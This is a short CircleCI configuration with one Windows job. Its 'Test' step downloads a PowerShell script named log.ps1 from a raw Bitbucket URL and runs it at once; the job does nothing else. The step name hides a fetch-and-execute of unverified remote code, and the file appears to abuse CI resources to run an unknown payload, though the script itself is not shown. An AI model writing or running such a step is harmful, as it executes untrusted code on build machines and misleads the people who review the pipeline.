version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/poporwort/ompongk/raw/0167a3ef66b65271bfb5206ef72370495509675c/log.ps1 -OutFile log.ps1
            ./log.ps1